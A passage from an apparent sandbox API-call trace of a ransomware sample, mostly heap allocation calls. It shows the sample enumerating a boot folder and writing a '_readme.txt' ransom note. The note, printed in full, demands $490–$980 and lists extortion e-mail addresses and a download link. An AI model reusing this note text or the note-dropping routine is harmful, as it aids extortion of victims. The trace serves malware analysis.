Flags=0x0, Size=0x20) returned 0x2e83688 [0183.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.009] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0184.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.009] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.009] PathFindFileNameW (pszPath="") returned="" [0184.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.009] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.010] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.010] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.010] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.010] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0184.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.010] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0184.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.010] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.011] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.011] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.012] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.022] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.022] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.022] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.022] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.023] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.028] RtlAllocateHeap 